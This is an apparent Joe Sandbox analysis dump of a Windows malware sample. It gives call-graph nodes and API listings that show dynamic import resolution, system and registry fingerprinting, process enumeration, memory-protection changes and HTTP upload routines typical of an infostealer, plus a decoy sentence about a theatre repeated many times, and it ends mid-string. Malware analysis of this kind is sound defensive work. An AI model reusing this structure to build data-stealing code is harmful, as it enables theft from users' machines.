15145 c42584 15144->15145 15146 c4a9b0 4 API calls 15145->15146 15147 c425ae 15146->15147 15148 c4a8a0 lstrcpy 15147->15148 15149 c425b7 15148->15149 15150 c4a9b0 4 API calls 15149->15150 15151 c425d6 15150->15151 15152 c4a8a0 lstrcpy 15151->15152 15153 c425df 15152->15153 15154 c4a9b0 4 API calls 15153->15154 15155 c42600 15154->15155 15156 c4a8a0 lstrcpy 15155->15156 15157 c42609 15156->15157 15701 c48680 15157->15701 15159 c42620 15160 c4a920 3 API calls 15159->15160 15161 c42633 15160->15161 15162 c4a8a0 lstrcpy 15161->15162 15163 c4263c 15162->15163 15164 c4265a lstrlen 15163->15164 15165 c4266a 15164->15165 15166 c4a740 lstrcpy 15165->15166 15167 c4267c 15166->15167 15168 c31590 lstrcpy 15167->15168 15169 c4268d 15168->15169 15711 c45190 15169->15711 15171 c42699 15171->13603 15899 c4aad0 15172->15899 15174 c35009 InternetOpenUrlA 15175 c35021 15174->15175 15176 c350a0 InternetCloseHandle InternetCloseHandle 15175->15176 15177 c3502a InternetReadFile 15175->15177 15178 c350ec 15176->15178 15177->15175 15178->13607 15900 c398d0 15179->15900 15181 c40759 15182 c4077d 15181->15182 15183 c40a38 15181->15183 15185 c40799 StrCmpCA 15182->15185 15184 c31590 lstrcpy 15183->15184 15186 c40a49 15184->15186 15187 c407a8 15185->15187 15188 c40843 15185->15188 16076 c40250 15186->16076 15190 c4a7a0 lstrcpy 15187->15190 15193 c40865 StrCmpCA 15188->15193 15192 c407c3 15190->15192 15195 c31590 lstrcpy 15192->15195 15194 c40874 15193->15194 15231 c4096b 15193->15231 15196 c4a740 lstrcpy 15194->15196 15197 c4080c 15195->15197 15199 c40881 15196->15199 15200 c4a7a0 lstrcpy 15197->15200 15198 c4099c StrCmpCA 15201 c40a2d 15198->15201 15202 c409ab 15198->15202 15203 c4a9b0 4 API calls 15199->15203 15204 c40823 15200->15204 15201->13611 15205 c31590 lstrcpy 15202->15205 15206 c408ac 15203->15206 15207 c4a7a0 lstrcpy 15204->15207 15208 c409f4 15205->15208 15209 c4a920 3 API calls 15206->15209 15210 c4083e 15207->15210 15211 c4a7a0 lstrcpy 15208->15211 15212 c408b3 15209->15212 15903 c3fb00 15210->15903 15214 c40a0d 15211->15214 15215 c4a9b0 4 API calls 15212->15215 15216 c4a7a0 lstrcpy 15214->15216 15217 c408ba 15215->15217 15218 c40a28 15216->15218 15219 c4a8a0 lstrcpy 15217->15219 15231->15198 15551 c4a7a0 lstrcpy 15550->15551 15552 c31683 15551->15552 15553 c4a7a0 lstrcpy 15552->15553 15554 c31695 15553->15554 15555 c4a7a0 lstrcpy 15554->15555 15556 c316a7 15555->15556 15557 c4a7a0 lstrcpy 15556->15557 15558 c315a3 15557->15558 15558->14434 15560 c347c6 15559->15560 15561 c34838 lstrlen 15560->15561 15585 c4aad0 15561->15585 15563 c34848 InternetCrackUrlA 15564 c34867 15563->15564 15564->14511 15566 c4a740 lstrcpy 15565->15566 15567 c48b74 15566->15567 15568 c4a740 lstrcpy 15567->15568 15569 c48b82 GetSystemTime 15568->15569 15570 c48b99 15569->15570 15571 c4a7a0 lstrcpy 15570->15571 15572 c48bfc 15571->15572 15572->14526 15574 c4a931 15573->15574 15575 c4a988 15574->15575 15578 c4a968 lstrcpy lstrcat 15574->15578 15576 c4a7a0 lstrcpy 15575->15576 15577 c4a994 15576->15577 15577->14529 15578->15575 15579->14644 15581 c34eee 15580->15581 15582 c39af9 LocalAlloc 15580->15582 15581->14532 15581->14534 15582->15581 15583 c39b14 CryptStringToBinaryA 15582->15583 15583->15581 15584 c39b39 LocalFree 15583->15584 15584->15581 15585->15563 15586->14654 15587->14795 15588->14797 15589->14805 15718 c477a0 15590->15718 15593 c476c6 RegOpenKeyExA 15595 c47704 RegCloseKey 15593->15595 15596 c476e7 RegQueryValueExA 15593->15596 15594 c41c1e 15594->14887 15595->15594 15596->15595 15598 c41c99 15597->15598 15598->14901 15600 c41e09 15599->15600 15600->14943 15602 c47a9a wsprintfA 15601->15602 15603 c41e84 15601->15603 15602->15603 15603->14957 15605 c47b4d 15604->15605 15606 c41efe 15604->15606 15725 c48d20 LocalAlloc CharToOemW 15605->15725 15606->14971 15609 c4a740 lstrcpy 15608->15609 15610 c47bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15609->15610 15619 c47c25 15610->15619 15611 c47c46 GetLocaleInfoA 15611->15619 15612 c47d18 15613 c47d1e LocalFree 15612->15613 15614 c47d28 15612->15614 15613->15614 15615 c4a7a0 lstrcpy 15614->15615 15617 c47d37 15615->15617 15616 c4a9b0 lstrcpy lstrlen lstrcpy lstrcat 15616->15619 15617->14984 15618 c4a8a0 lstrcpy 15618->15619 15619->15611 15619->15612 15619->15616 15619->15618 15621 c42008 15620->15621 15621->14999 15623 c494b5 15622->15623 15624 c49493 GetModuleFileNameExA CloseHandle 15622->15624 15625 c4a740 lstrcpy 15623->15625 15624->15623 15626 c42091 15625->15626 15626->15014 15628 c42119 15627->15628 15629 c47e68 RegQueryValueExA 15627->15629 15628->15028 15630 c47e8e RegCloseKey 15629->15630 15630->15628 15632 c47fb9 GetLogicalProcessorInformationEx 15631->15632 15633 c47fd8 GetLastError 15632->15633 15635 c48029 15632->15635 15634 c48022 15633->15634 15643 c47fe3 15633->15643 15638 c42194 15634->15638 15639 c489f0 2 API calls 15634->15639 15640 c489f0 2 API calls 15635->15640 15638->15042 15639->15638 15641 c4807b 15640->15641 15641->15634 15642 c48084 wsprintfA 15641->15642 15642->15638 15643->15632 15643->15638 15726 c489f0 15643->15726 15729 c48a10 GetProcessHeap RtlAllocateHeap 15643->15729 15645 c4220f 15644->15645 15645->15056 15647 c489b0 15646->15647 15648 c4814d GlobalMemoryStatusEx 15647->15648 15651 c48163 __aulldiv 15648->15651 15649 c4819b wsprintfA 15650 c42289 15649->15650 15650->15070 15651->15649 15653 c487fb GetProcessHeap RtlAllocateHeap wsprintfA 15652->15653 15655 c4a740 lstrcpy 15653->15655 15656 c4230b 15655->15656 15656->15084 15658 c4a740 lstrcpy 15657->15658 15664 c48229 15658->15664 15659 c48263 15660 c4a7a0 lstrcpy 15659->15660 15662 c482dc 15660->15662 15661 c4a9b0 lstrcpy lstrlen lstrcpy lstrcat 15661->15664 15662->15101 15663 c4a8a0 lstrcpy 15663->15664 15664->15659 15664->15661 15664->15663 15666 c4a740 lstrcpy 15665->15666 15667 c4835c RegOpenKeyExA 15666->15667 15668 c483d0 15667->15668 15669 c483ae 15667->15669 15671 c48613 RegCloseKey 15668->15671 15672 c483f8 RegEnumKeyExA 15668->15672 15670 c4a7a0 lstrcpy 15669->15670 15681 c483bd 15670->15681 15675 c4a7a0 lstrcpy 15671->15675 15673 c4860e 15672->15673 15674 c4843f wsprintfA RegOpenKeyExA 15672->15674 15673->15671 15676 c48485 RegCloseKey RegCloseKey 15674->15676 15677 c484c1 RegQueryValueExA 15674->15677 15675->15681 15678 c4a7a0 lstrcpy 15676->15678 15679 c48601 RegCloseKey 15677->15679 15680 c484fa lstrlen 15677->15680 15678->15681 15679->15673 15680->15679 15682 c48510 15680->15682 15681->15127 15683 c4a9b0 4 API calls 15682->15683 15684 c48527 15683->15684 15685 c4a8a0 lstrcpy 15684->15685 15686 c48533 15685->15686 15687 c4a9b0 4 API calls 15686->15687 15688 c48557 15687->15688 15689 c4a8a0 lstrcpy 15688->15689 15690 c48563 15689->15690 15691 c4856e RegQueryValueExA 15690->15691 15691->15679 15692 c485a3 15691->15692 15693 c4a9b0 4 API calls 15692->15693 15694 c485ba 15693->15694 15695 c4a8a0 lstrcpy 15694->15695 15696 c485c6 15695->15696 15697 c4a9b0 4 API calls 15696->15697 15698 c485ea 15697->15698 15699 c4a8a0 lstrcpy 15698->15699 15700 c485f6 15699->15700 15700->15679 15702 c4a740 lstrcpy 15701->15702 15703 c486bc CreateToolhelp32Snapshot Process32First 15702->15703 15704 c4875d CloseHandle 15703->15704 15705 c486e8 Process32Next 15703->15705 15706 c4a7a0 lstrcpy 15704->15706 15705->15704 15710 c486fd 15705->15710 15707 c48776 15706->15707 15707->15159 15708 c4a8a0 lstrcpy 15708->15710 15709 c4a9b0 lstrcpy lstrlen lstrcpy lstrcat 15709->15710 15710->15705 15710->15708 15710->15709 15712 c4a7a0 lstrcpy 15711->15712 15713 c451b5 15712->15713 15714 c31590 lstrcpy 15713->15714 15715 c451c6 15714->15715 15730 c35100 15715->15730 15717 c451cf 15717->15171 15721 c47720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15718->15721 15720 c476b9 15720->15593 15720->15594 15722 c47765 RegQueryValueExA 15721->15722 15723 c47780 RegCloseKey 15721->15723 15722->15723 15724 c47793 15723->15724 15724->15720 15725->15606 15727 c48a0c 15726->15727 15728 c489f9 GetProcessHeap HeapFree 15726->15728 15727->15643 15728->15727 15729->15643 15731 c4a7a0 lstrcpy 15730->15731 15732 c35119 15731->15732 15733 c347b0 2 API calls 15732->15733 15734 c35125 15733->15734 15890 c48ea0 15734->15890 15736 c35184 15737 c35192 lstrlen 15736->15737 15738 c351a5 15737->15738 15739 c48ea0 4 API calls 15738->15739 15740 c351b6 15739->15740 15741 c4a740 lstrcpy 15740->15741 15742 c351c9 15741->15742 15743 c4a740 lstrcpy 15742->15743 15744 c351d6 15743->15744 15745 c4a740 lstrcpy 15744->15745 15746 c351e3 15745->15746 15747 c4a740 lstrcpy 15746->15747 15748 c351f0 15747->15748 15749 c4a740 lstrcpy 15748->15749 15750 c351fd InternetOpenA StrCmpCA 15749->15750 15751 c3522f 15750->15751 15752 c358c4 InternetCloseHandle 15751->15752 15753 c48b60 3 API calls 15751->15753 15759 c358d9 codecvt 15752->15759 15754 c3524e 15753->15754 15755 c4a920 3 API calls 15754->15755 15756 c35261 15755->15756 15757 c4a8a0 lstrcpy 15756->15757 15758 c3526a 15757->15758 15760 c4a9b0 4 API calls 15758->15760 15763 c4a7a0 lstrcpy 15759->15763 15761 c352ab 15760->15761 15762 c4a920 3 API calls 15761->15762 15764 c352b2 15762->15764 15770 c35913 15763->15770 15765 c4a9b0 4 API calls 15764->15765 15766 c352b9 15765->15766 15767 c4a8a0 lstrcpy 15766->15767 15768 c352c2 15767->15768 15769 c4a9b0 4 API calls 15768->15769 15771 c35303 15769->15771 15770->15717 15772 c4a920 3 API calls 15771->15772 15773 c3530a 15772->15773 15774 c4a8a0 lstrcpy 15773->15774 15775 c35313 15774->15775 15776 c35329 InternetConnectA 15775->15776 15776->15752 15777 c35359 HttpOpenRequestA 15776->15777 15779 c358b7 InternetCloseHandle 15777->15779 15780 c353b7 15777->15780 15779->15752 15781 c4a9b0 4 API calls 15780->15781 15782 c353cb 15781->15782 15783 c4a8a0 lstrcpy 15782->15783 15784 c353d4 15783->15784 15785 c4a920 3 API calls 15784->15785 15786 c353f2 15785->15786 15787 c4a8a0 lstrcpy 15786->15787 15788 c353fb 15787->15788 15789 c4a9b0 4 API calls 15788->15789 15790 c3541a 15789->15790 15791 c4a8a0 lstrcpy 15790->15791 15792 c35423 15791->15792 15793 c4a9b0 4 API calls 15792->15793 15794 c35444 15793->15794 15795 c4a8a0 lstrcpy 15794->15795 15796 c3544d 15795->15796 15797 c4a9b0 4 API calls 15796->15797 15798 c3546e 15797->15798 15891 c48ead CryptBinaryToStringA 15890->15891 15893 c48ea9 15890->15893 15892 c48ece GetProcessHeap RtlAllocateHeap 15891->15892 15891->15893 15892->15893 15894 c48ef4 codecvt 15892->15894 15893->15736 15895 c48f05 CryptBinaryToStringA 15894->15895 15895->15893 15899->15174 16142 c39880 15900->16142 15902 c398e1 15902->15181 15904 c4a740 lstrcpy 15903->15904 15905 c3fb16 15904->15905 16077 c4a740 lstrcpy 16076->16077 16078 c40266 16077->16078 16079 c48de0 2 API calls 16078->16079 16080 c4027b 16079->16080 16081 c4a920 3 API calls 16080->16081 16082 c4028b 16081->16082 16083 c4a8a0 lstrcpy 16082->16083 16084 c40294 16083->16084 16085 c4a9b0 4 API calls 16084->16085 16143 c3988e 16142->16143 16146 c36fb0 16143->16146 16145 c398ad codecvt 16145->15902 16149 c36d40 16146->16149 16150 c36d63 16149->16150 16164 c36d59 16149->16164 16165 c36530 16150->16165 16154 c36dbe 16154->16164 16175 c369b0 16154->16175 16156 c36e2a 16157 c36ee6 VirtualFree 16156->16157 16159 c36ef7 16156->16159 16156->16164 16157->16159 16158 c36f41 16162 c489f0 2 API calls 16158->16162 16158->16164 16159->16158 16160 c36f26 FreeLibrary 16159->16160 16161 c36f38 16159->16161 16160->16159 16163 c489f0 2 API calls 16161->16163 16162->16164 16163->16158 16164->16145 16166 c36542 16165->16166 16168 c36549 16166->16168 16185 c48a10 GetProcessHeap RtlAllocateHeap 16166->16185 16168->16164 16169 c36660 16168->16169 16174 c3668f VirtualAlloc 16169->16174 16171 c36730 16172 c36743 VirtualAlloc 16171->16172 16173 c3673c 16171->16173 16172->16173 16173->16154 16174->16171 16174->16173 16176 c369c9 16175->16176 16180 c369d5 16175->16180 16177 c36a09 LoadLibraryA 16176->16177 16176->16180 16178 c36a32 16177->16178 16177->16180 16184 c36ae0 16178->16184 16186 c48a10 GetProcessHeap RtlAllocateHeap 16178->16186 16180->16156 16181 c36ba8 GetProcAddress 16181->16180 16181->16184 16182 c489f0 2 API calls 16182->16184 16183 c36a8b 16183->16180 16183->16182 16184->16180 16184->16181 16185->16168 16186->16183

                                    Executed Functions

                                    Function 00C49860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 660 c49860-c49874 call c49750 663 c49a93-c49af2 LoadLibraryA * 5 660->663 664 c4987a-c49a8e call c49780 GetProcAddress * 21 660->664 666 c49af4-c49b08 GetProcAddress 663->666 667 c49b0d-c49b14 663->667 664->663 666->667 669 c49b46-c49b4d 667->669 670 c49b16-c49b41 GetProcAddress * 2 667->670 671 c49b4f-c49b63 GetProcAddress 669->671 672 c49b68-c49b6f 669->672 670->669 671->672 673 c49b71-c49b84 GetProcAddress 672->673 674 c49b89-c49b90 672->674 673->674 675 c49bc1-c49bc2 674->675 676 c49b92-c49bbc GetProcAddress * 2 674->676 676->675
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,019D07C8), ref: 00C498A1
                                    • GetProcAddress.KERNEL32(75900000,019D06D8), ref: 00C498BA
                                    • GetProcAddress.KERNEL32(75900000,019D07F8), ref: 00C498D2
                                    • GetProcAddress.KERNEL32(75900000,019D0660), ref: 00C498EA
                                    • GetProcAddress.KERNEL32(75900000,019D0750), ref: 00C49903
                                    • GetProcAddress.KERNEL32(75900000,019D8800), ref: 00C4991B
                                    • GetProcAddress.KERNEL32(75900000,019C6920), ref: 00C49933
                                    • GetProcAddress.KERNEL32(75900000,019C67E0), ref: 00C4994C
                                    • GetProcAddress.KERNEL32(75900000,019D05A0), ref: 00C49964
                                    • GetProcAddress.KERNEL32(75900000,019D0828), ref: 00C4997C
                                    • GetProcAddress.KERNEL32(75900000,019D0588), ref: 00C49995
                                    • GetProcAddress.KERNEL32(75900000,019D07B0), ref: 00C499AD
                                    • GetProcAddress.KERNEL32(75900000,019C66A0), ref: 00C499C5
                                    • GetProcAddress.KERNEL32(75900000,019D0720), ref: 00C499DE
                                    • GetProcAddress.KERNEL32(75900000,019D0690), ref: 00C499F6
                                    • GetProcAddress.KERNEL32(75900000,019C68A0), ref: 00C49A0E
                                    • GetProcAddress.KERNEL32(75900000,019D0630), ref: 00C49A27
                                    • GetProcAddress.KERNEL32(75900000,019D0570), ref: 00C49A3F
                                    • GetProcAddress.KERNEL32(75900000,019C66C0), ref: 00C49A57
                                    • GetProcAddress.KERNEL32(75900000,019D0678), ref: 00C49A70
                                    • GetProcAddress.KERNEL32(75900000,019C6800), ref: 00C49A88
                                    • LoadLibraryA.KERNEL32(019D0558,?,00C46A00), ref: 00C49A9A
                                    • LoadLibraryA.KERNEL32(019D06A8,?,00C46A00), ref: 00C49AAB
                                    • LoadLibraryA.KERNEL32(019D0768,?,00C46A00), ref: 00C49ABD
                                    • LoadLibraryA.KERNEL32(019D05B8,?,00C46A00), ref: 00C49ACF
                                    • LoadLibraryA.KERNEL32(019D06C0,?,00C46A00), ref: 00C49AE0
                                    • GetProcAddress.KERNEL32(75070000,019D06F0), ref: 00C49B02
                                    • GetProcAddress.KERNEL32(75FD0000,019D0780), ref: 00C49B23
                                    • GetProcAddress.KERNEL32(75FD0000,019D8EF8), ref: 00C49B3B
                                    • GetProcAddress.KERNEL32(75A50000,019D8F88), ref: 00C49B5D
                                    • GetProcAddress.KERNEL32(74E50000,019C6A20), ref: 00C49B7E
                                    • GetProcAddress.KERNEL32(76E80000,019D8930), ref: 00C49B9F
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00C49BB6
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00C49BAA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: 722c1462f64ebab733a8b652e6815a76d2329ba0ee3d9e49f7c9c31e334d0f80
                                    • Instruction ID: 0fec3c8004f8742d7dd9d43a0fb422571a8d4c4f69c04d382e594feaa8c301ce
                                    • Opcode Fuzzy Hash: 722c1462f64ebab733a8b652e6815a76d2329ba0ee3d9e49f7c9c31e334d0f80
                                    • Instruction Fuzzy Hash: 7AA15AB55042419FE348EFAAFD8996E37F9F7C820170C453AE61DA3264D63998C9CB13
                                    Function 00C345C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 764 c345c0-c34695 RtlAllocateHeap 781 c346a0-c346a6 764->781 782 c3474f-c347a9 VirtualProtect 781->782 783 c346ac-c3474a 781->783 783->781
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C3460F
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00C3479C
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3466D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346B7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34622
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34713
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345DD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3462D
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34638
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345F3
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34683
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34657
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34643
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346AC
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34678
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345C7
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34729
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3474F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345D2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34734
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346C2
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3473F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3475A
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3477B
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34770
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346CD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34662
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34617
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C3471E
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C345E8
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C34765
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C346D8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo 